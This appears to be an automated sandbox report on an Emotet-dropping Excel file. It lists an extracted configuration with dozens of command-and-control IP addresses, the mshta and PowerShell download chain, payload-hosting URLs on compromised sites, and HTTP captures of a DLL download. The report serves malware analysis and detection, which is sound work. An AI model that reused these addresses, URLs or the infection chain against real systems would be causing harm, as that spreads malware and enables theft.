                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/Avira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 13.2.rundll32.exe.2430000.5.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: imedpub_6.xlsReversingLabs: Detection: 18%
                            Multi AV Scanner detection for domain / URL
                            Source: hostfeeling.comVirustotal: Detection: 10%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\JooSee.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: hostfeeling.com
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80Jump to behavior
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:02:00 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:02:00 GMTExpires: Fri, 28 Jan 2022 20:02:00 GMTContent-Disposition: attachment; filename="uHkwl.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: mshta.exe, 00000004.00000003.433680671.00000000003BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000003.419116889.0000000000380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html:
                            Source: imedpub_6.xls.0.drString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlC
                            Source: mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.420573882.0000000002ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.420332765.0000000002AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
                            Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html~
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.p
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.678389430.000000001B494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.png
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-adm
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en-
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.15.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ed17b873e6546
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.suk
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-cont
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
                            Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ja.com/
                            Source: powershell.exe, 00000006.00000002.677598508.00000000038AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/asset
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/f
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
                            Source: mshta.exe, 00000004.00000003.419178772.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434882434.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435386261.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433698819.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435368888.0000000003C92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433744661.0000000003C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419492395.0000000003CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/3
                            Source: rundll32.exe, 0000000F.00000002.673084051.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/SoFzpWBFIEFVoCFQgg
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/9
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: hostfeeling.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
